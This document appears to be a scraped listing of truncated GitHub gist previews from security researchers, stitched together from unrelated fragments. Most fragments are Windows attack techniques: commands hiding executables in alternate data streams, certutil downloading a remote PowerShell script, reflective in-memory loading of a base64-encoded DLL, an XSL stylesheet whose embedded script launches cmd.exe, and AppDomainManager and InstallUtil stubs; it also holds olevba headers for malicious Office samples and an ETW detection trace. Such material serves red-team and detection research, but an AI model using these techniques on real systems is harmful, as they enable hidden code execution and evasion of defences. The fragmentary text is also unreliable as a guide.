Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
#Add content to ADS | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey |
# mandatory https://github.com/zacbrown/PowerKrabsEtw for PowerKrabsEtw module | |
import-module .\PowerKrabsEtw | |
$trace = New-KrabsEtwUserTrace | |
$provider = New-KrabsEtwUserProvider -ProviderName "Microsoft-Windows-Kernel-Audit-API-Calls" | |
$filter = New-KrabsEtwCallbackFilter -EventId 6 | |
Set-KrabsEtwCallbackFilter -UserProvider $provider -Filter $filter | |
Set-KrabsEtwUserProvider -Trace $trace -Provider $provider | |
Start-KrabsEtwUserTrace -Trace $trace | Where-Object { ($_.EtwProcessId -ne $_.TargetProcessId) -and ($_.DesiredAccess -bAnd 0x0002) } |
$Domain = [AppDomain]::CurrentDomain | |
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
$TypeBuilder.CreateType() | |
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
using System; | |
using System.IO; | |
using System.Reflection; | |
using System.Runtime.Hosting; | |
public sealed class MyAppDomainManager : AppDomainManager | |
{ | |
public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
{ |
## uploaded by @JohnLaTwC | |
## Sample hash: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OpX:MASIHB-- f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
=============================================================================== | |
FILE: f4816b95104356d08187c615e0dfb1bfd4c85a0d3f8a07a40c45d66693695058 | |
Type: OpenXML | |
------------------------------------------------------------------------------- |
## uploaded by @JohnLaTwC | |
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
olevba 0.52dev7 - http://decalage.info/python/oletools | |
Flags Filename | |
----------- ----------------------------------------------------------------- | |
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
=============================================================================== | |
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75 | |
Type: OLE | |
------------------------------------------------------------------------------- |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
]]> </ms:script> |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |